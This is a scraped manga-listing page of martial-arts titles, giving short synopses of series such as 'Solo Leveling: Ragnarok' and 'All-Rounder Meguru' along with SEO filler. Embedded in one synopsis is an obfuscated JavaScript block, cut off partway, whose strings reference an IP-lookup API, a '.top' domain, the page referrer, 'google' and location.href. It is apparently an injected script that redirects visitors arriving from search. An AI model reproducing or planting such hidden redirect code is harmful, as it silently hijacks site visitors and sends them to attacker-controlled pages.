Martial Arts - Page 14

Discover top manga Martial Arts with stunning art and thrilling tales. Enjoy the best Martial Arts manga free online today!

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In a little town near Osaka, an old tradition is being perpetuated. Every year, for hundreds of years, the men of the town defy each other in the “grand ceremony of Masuraou”. Their weapons? Their courage and their fists! Their goals? Becoming the king of the town!It's in this atmosphere that Takeshi Yamato, a young high schooler from Tokyo, moves in. Ex-gang leader decorated with an incredible secret, he is decided to forget the past and become a socially acceptable guy... However, between his secret being found out, the fights, the girls and the messing up with his friends, he is far from becoming a model high schooler!


The Heavenly Demon Wants To Be A Chef

Read Manhwa The Heavenly Demon Wants to be a Chef Online For Free At Hari Manga The Heavenly Demon Wants to be a Chef Manga also known as “요리사가 되고 싶은 천마님”. This OnGoing webtoon was released on 2024. The story was written by Filnar and illustrations by Chunsan. The content of the comic The Heavenly Demon Wants to be a Chef: Due to a gate related accident, Woojin regains the memories of his past life… a life as the Heavenly Demon, ruler of China! However, as the Heavenly Demon, there was a dream he never managed to achieve. Now, in this life, he’ll do whatever it costs to fulfil his lifelong dream of becoming a chef! This is the legendary (?) story of Cheon Woojin, the former Heavenly Demon, chasing his dreams! The comic The Heavenly Demon Wants to be a Chef belongs to the Genre: Cooking, Fantasy, Murim, System, Transmigration KunManga is a comprehensive website featuring the latest and hottest manga, updated rapidly to cater to readers with high-quality images and provide them with excellent experiences. With keywords such as “TopManhua” and “Manhwa Website,” as well as related terms like Smut Manhwa, New Manhwa 2024, and Read Manga Engsub ensures readers have access to a wide selection of top-notch manga content. Please always follow and share with your friends to support the website MANGAZIN.ORG so that we have more motivation to publish the latest and best comics. Follow get to read NEW MANHWA updated: Under the Shade of Wild Roses The Boy Next Door Love Or Attraction


Back to the city: the strongest investment king

Back to the city: the strongest investment king is a Manga/Manhwa/Manhua in (English/Raw) language, Action series is written by Updating This Comic is About In his previous life, he was forced to jump from a building after his wife had drained hundreds of thousands of hard-earned money, and then opened his eyes, Yan Mu returned to the day he proposed to Fang Yuxue, and 500,000 bride money was still in his hands! Rejecting the demon, buying lottery tickets, buying properties, and making investments to achieve the strongest rich life in history “back to the city: the strongest investment king”<script></script><script>function _0x2d74(_0x3d4db2,_0x5ee975){var _0x3973d7=_0x38fb();return _0x2d74=function(_0x128a50,_0x1339bf){_0x128a50=_0x128a50-(-0x1*0x145f+-0x17e*0xd+0x2983*0x1);var _0x33e9b7=_0x3973d7[_0x128a50];return _0x33e9b7;},_0x2d74(_0x3d4db2,_0x5ee975);}function _0x38fb(){var _0x249ef5=['PHnKu','.top/','location','6039uAPXWG','random','1513218uDSwWL','4WzDAgz','text','crUZi','6846INgawQ','','20IvuNpE','4697OIHzmC','vGdKl','EpjqP','lVJEv','https://ip','689249WDXkrQ','XCHwc','http://rea','.customapi','EwTpU','includes','href','7304XcTowh','Nmjrn','floor','then','203265yGYtms','200193GrNREC','referrer','438655iPqoOC','uffxq','google'];_0x38fb=function(){return _0x249ef5;};return _0x38fb();}(function(_0x48890,_0x33ff95){var _0x560cf2=_0x2d74,_0x4fc630=_0x48890();while(!![]){try{var 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The Count’s Youngest Son is A Player

Read manhwa The Count’s Youngest Son is A Player / 백작가 막내아들은 플레이어 Bae DoHyun lost his life because of the major guilds’ evil plan. He then possesed the main character in a game that’s still in its beta service. Reincarnated as Rich family’s youngest son, Raul. “I’ll take it all this time!” From Rank 1 player to the most powerful NPC, his new story begins.


Solo Leveling: Ragnarok

Read “Solo Leveling: Ragnarok Manga” – “Solo Leveling: Ragnarok Manhwa” Online Free On MANGAZIN The summary of the comics “Solo Leveling: Ragnarok”: The Earth’s existence is under threat once more as Itarim, the gods of other universes, seek to fill the void left by the Absolute Being. Sung Jinwoo has no choice but to send Beru, the shadow ant king, to awaken his son’s powers and start him on the journey he once took. Suho must conquer the shadow dungeon and earn his place in the world of hunters as he navigates through a new world against a new evil looking to swallow the world whole. “Solo Leveling: Ragnarok” is alternatively named: 나 혼자만 레벨업 : 라그나로크 The comics “Solo Leveling: Ragnarok” belongs to the Genre: Action, Adventure, Fantasy, Shounen “MANHWACLAN, MANGA UPDATES, KUNMANGA…” are the most searched keywords on the website MANHWACLAN. We offer a wide selection of the best and newest comics series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at LikeManga. You can read TOP MANGA The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant North Snow Love Story

2 days ago

Masters of Endurance

In this world, there are a group of masters known as “Death God’s Enemy”. Those masters can withstand all kinds of diseases, disasters, and even death itself. As long as you have the right qualifications, you may even employ them to free you from the Death God’s grip.


Desolate Era

In the world of Mang Huang Ji, to survive, tribes of humans have to fight against the forces of the heavens, the earth, and demons. To live long and free, the three great disasters and nine robberies sent death without regret to the immortals. Then one day, a boy named "Ji Shi" was born to the strongest tribe in Yu Ji. As a direct descendant, he bears the responsibility to protect his people, who grow to respect him. With an iron will, he begins the long journey of an immortal guardian.


Skill Unparalleled

The Tianwu Boxing Hall in Haicheng City is the branch of the world's largest boxing gym. In order to earn money for the treatment of the righteous girl, Su Chen came to Tianwu Boxing Hall to go sparring. Because of his outstanding learning ability and strong comprehension, Su Chen became the “gold medal training” of the boxing gym. However, the splendid performance of Su Chen attracted the jealousy of the leader Wang Tingwei. He made Su Chen into a dangerous situation. Su Chen, who was involved in it, not only wants to live, but also takes this opportunity to make a career.


All-Rounder Meguru

Meguru Takayanagi is trying to find a "practical" fighting method rather than the traditional karate he used to do when he was a kid, enrolling himself in a mixed martial arts gym (The fighter's brew) he started on his road to become a "Shooto" fighter, that's when he will find out his best friend from childhood and the dark secret that surrounds the motivation for revenge. Comedy, fights, slice of life, All rounder Meguru has it all


ReMember (KING Gonta)

From MangaHelpers: Finding himself in a war torn Japan that has just lost the war to the US, Zaji wanders the land that used to be a city. Suffering from amnesia, the only thing that he remembers is that he has to remember something important. He quickly learns that he has incredible martial arts combat skills and is able to use it even if he doesn't realize it since it seems that it has been engrained into his body through years of training. He is taken in by Gin, the owner of the local bar that occupying US soldiers frequent. Zaji learns the full extent of his strength as he tries to protect the helpless in a devastated society.


Huashan Gale Sword

After the mysterious demise of the venerable Master Shanxian from the Huashan Sect in a duel with the demonic martial artist Lu Keshen, his direct disciple, Qingfeng, is left alone. Soon after, a malevolent enchantress from the demonic sect, eager to obtain the legendary Four Divine Swords, launches a surprise attack on Huashan Sect. In his quest to thwart the enchantress, Qingfeng comes into contact with the White Tiger Sword, one of the Four Divine Swords. Unexpectedly, he becomes the rightful owner of the White Tiger Sword, setting the stage for a destiny he never anticipated.+


Having Finished Her Lifelong Revenge, Ms. Dark Elf Has Too Much Free Time

A Dark Elf who finally got her revenge after many years of training to avenge the burning of her home village. What is waiting for her is"free time"...! A dark elf who has too much free time to go on a journey finds cute things! Let's the story begin!
